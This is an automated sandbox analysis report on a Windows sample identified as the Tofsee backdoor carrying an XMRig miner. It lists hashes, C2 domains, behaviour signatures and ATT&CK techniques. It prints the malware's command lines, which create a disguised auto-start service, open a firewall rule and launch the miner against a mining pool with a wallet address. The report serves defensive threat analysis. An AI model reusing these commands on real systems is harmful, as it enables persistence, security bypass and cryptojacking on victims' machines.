Analysis

  • max time kernel
    145s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    15-05-2023 00:51

General

  • Target

    file.exe

  • Size

    297KB

  • MD5

    2e6852059d88ea39a455ef121a3fa54d

  • SHA1

    0ec408b337caebec2edc0397670255fc55f50a8e

  • SHA256

    54aa74ef48f5da0112fc02522087700d2b1a77182bb26bd5091a1f4f1adcb952

  • SHA512

    c224297d1d2ee0b2f590419ebabb69a68f50fa6124970fc3f95b0902c6fa656ecdcb3745eeb0700683aaaf8af957f6e2985676e03a7ee7a2926c25af988db2e0

  • SSDEEP

    3072:NpX0GufbSvdBzL40UTsJ1ohXkHIRjOjkru7mNmY0nVTcq5sl8mcJOWVnxHGG:XpuDSvPzL40msJ8XLjOYru7xVKCBtc

Malware Config

Extracted

Family

tofsee

C2

vanaheim.cn

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 7 IoCs
  • Creates new service(s) 1 TTPs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies data under HKEY_USERS 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2024
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\qsfkklio\
      2⤵
        PID:860
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\rurkbdxn.exe" C:\Windows\SysWOW64\qsfkklio\
        2⤵
          PID:1488
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create qsfkklio binPath= "C:\Windows\SysWOW64\qsfkklio\rurkbdxn.exe /d\"C:\Users\Admin\AppData\Local\Temp\file.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:560
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description qsfkklio "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:1480
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start qsfkklio
          2⤵
          • Launches sc.exe
          PID:2004
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:584
      • C:\Windows\SysWOW64\qsfkklio\rurkbdxn.exe
        C:\Windows\SysWOW64\qsfkklio\rurkbdxn.exe /d"C:\Users\Admin\AppData\Local\Temp\file.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:736
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Windows security bypass
          • Sets service image path in registry
          • Deletes itself
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:652
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe --algo=cn-heavy/xhv -o fastpool.xyz:10162 -u abLocBRHmSKSwfZexhaPDFFpUd1Szsp1RWPZktGDuK2w76S3KYNSLGndi55YtoHoKYbSFMCCWjxzTfwHxZSm7sNLe2rAq4DqbAF.70000 -p x -k
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1656

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Persistence

      New Service

      1
      T1050

      Modify Existing Service

      1
      T1031

      Registry Run Keys / Startup Folder

      1
      T1060

      Privilege Escalation

      New Service

      1
      T1050

      Defense Evasion

      Disabling Security Tools

      1
      T1089

      Modify Registry

      2
      T1112

      Discovery

      System Information Discovery

      1
      T1082

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\rurkbdxn.exe
        Filesize

        11.3MB

        MD5

        e544cf75442268dd934ceb9588cf26de

        SHA1

        a34a57567adf2e259f55e82a2edb5899f9ab18d6

        SHA256

        e81067d15e145e8a9496259918e569b8b3334fe8fc509b58779ff31e90c4acae

        SHA512

        f09a0cea85aef5490fd4f0b8d697c716d9ed18ce30c77b248e4f4949b9cf9ebc1d5d2fc6b55b194af19a34c6c5043fb664e46d3cd01ec254f52c7bdf3f3bb394

      • C:\Windows\SysWOW64\qsfkklio\rurkbdxn.exe
        Filesize

        11.3MB

        MD5

        e544cf75442268dd934ceb9588cf26de

        SHA1

        a34a57567adf2e259f55e82a2edb5899f9ab18d6

        SHA256

        e81067d15e145e8a9496259918e569b8b3334fe8fc509b58779ff31e90c4acae

        SHA512

        f09a0cea85aef5490fd4f0b8d697c716d9ed18ce30c77b248e4f4949b9cf9ebc1d5d2fc6b55b194af19a34c6c5043fb664e46d3cd01ec254f52c7bdf3f3bb394

      • memory/652-88-0x00000000000C0000-0x00000000000D0000-memory.dmp
        Filesize

        64KB

      • memory/652-106-0x00000000000F0000-0x00000000000F7000-memory.dmp
        Filesize

        28KB

      • memory/652-61-0x0000000000080000-0x0000000000095000-memory.dmp
        Filesize

        84KB

      • memory/652-90-0x00000000000C0000-0x00000000000D0000-memory.dmp
        Filesize

        64KB

      • memory/652-63-0x0000000000080000-0x0000000000095000-memory.dmp
        Filesize

        84KB

      • memory/652-66-0x0000000000080000-0x0000000000095000-memory.dmp
        Filesize

        84KB

      • memory/652-124-0x0000000000080000-0x0000000000095000-memory.dmp
        Filesize

        84KB

      • memory/652-68-0x0000000000080000-0x0000000000095000-memory.dmp
        Filesize

        84KB

      • memory/652-69-0x0000000000080000-0x0000000000095000-memory.dmp
        Filesize

        84KB

      • memory/652-71-0x0000000001840000-0x0000000001A4F000-memory.dmp
        Filesize

        2.1MB

      • memory/652-75-0x00000000000A0000-0x00000000000A6000-memory.dmp
        Filesize

        24KB

      • memory/652-74-0x0000000001840000-0x0000000001A4F000-memory.dmp
        Filesize

        2.1MB

      • memory/652-78-0x00000000000C0000-0x00000000000D0000-memory.dmp
        Filesize

        64KB

      • memory/652-81-0x00000000000C0000-0x00000000000D0000-memory.dmp
        Filesize

        64KB

      • memory/652-82-0x00000000000C0000-0x00000000000D0000-memory.dmp
        Filesize

        64KB

      • memory/652-83-0x00000000000C0000-0x00000000000D0000-memory.dmp
        Filesize

        64KB

      • memory/652-84-0x00000000000C0000-0x00000000000D0000-memory.dmp
        Filesize

        64KB

      • memory/652-92-0x00000000000C0000-0x00000000000D0000-memory.dmp
        Filesize

        64KB

      • memory/652-86-0x00000000000C0000-0x00000000000D0000-memory.dmp
        Filesize

        64KB

      • memory/652-87-0x00000000000C0000-0x00000000000D0000-memory.dmp
        Filesize

        64KB

      • memory/652-91-0x00000000000C0000-0x00000000000D0000-memory.dmp
        Filesize

        64KB

      • memory/652-89-0x00000000000C0000-0x00000000000D0000-memory.dmp
        Filesize

        64KB

      • memory/652-62-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
        Filesize

        4KB

      • memory/652-105-0x0000000005510000-0x000000000591B000-memory.dmp
        Filesize

        4.0MB

      • memory/652-85-0x00000000000C0000-0x00000000000D0000-memory.dmp
        Filesize

        64KB

      • memory/652-93-0x00000000000C0000-0x00000000000D0000-memory.dmp
        Filesize

        64KB

      • memory/652-94-0x00000000000C0000-0x00000000000D0000-memory.dmp
        Filesize

        64KB

      • memory/652-96-0x00000000000C0000-0x00000000000D0000-memory.dmp
        Filesize

        64KB

      • memory/652-95-0x00000000000C0000-0x00000000000D0000-memory.dmp
        Filesize

        64KB

      • memory/652-97-0x00000000000C0000-0x00000000000D0000-memory.dmp
        Filesize

        64KB

      • memory/652-98-0x00000000000D0000-0x00000000000D5000-memory.dmp
        Filesize

        20KB

      • memory/652-101-0x00000000000D0000-0x00000000000D5000-memory.dmp
        Filesize

        20KB

      • memory/652-102-0x0000000005510000-0x000000000591B000-memory.dmp
        Filesize

        4.0MB

      • memory/736-67-0x0000000000400000-0x0000000002366000-memory.dmp
        Filesize

        31.4MB

      • memory/1656-121-0x0000000000110000-0x0000000000201000-memory.dmp
        Filesize

        964KB

      • memory/1656-110-0x0000000000110000-0x0000000000201000-memory.dmp
        Filesize

        964KB

      • memory/1656-111-0x0000000000110000-0x0000000000201000-memory.dmp
        Filesize

        964KB

      • memory/1656-115-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
        Filesize

        4KB

      • memory/1656-118-0x0000000000110000-0x0000000000201000-memory.dmp
        Filesize

        964KB

      • memory/1656-119-0x0000000000110000-0x0000000000201000-memory.dmp
        Filesize

        964KB

      • memory/1656-120-0x0000000000110000-0x0000000000201000-memory.dmp
        Filesize

        964KB

      • memory/1656-122-0x0000000000110000-0x0000000000201000-memory.dmp
        Filesize

        964KB

      • memory/1656-123-0x0000000000110000-0x0000000000201000-memory.dmp
        Filesize

        964KB

      • memory/2024-60-0x0000000000400000-0x0000000002366000-memory.dmp
        Filesize

        31.4MB

      • memory/2024-56-0x0000000000220000-0x0000000000233000-memory.dmp
        Filesize

        76KB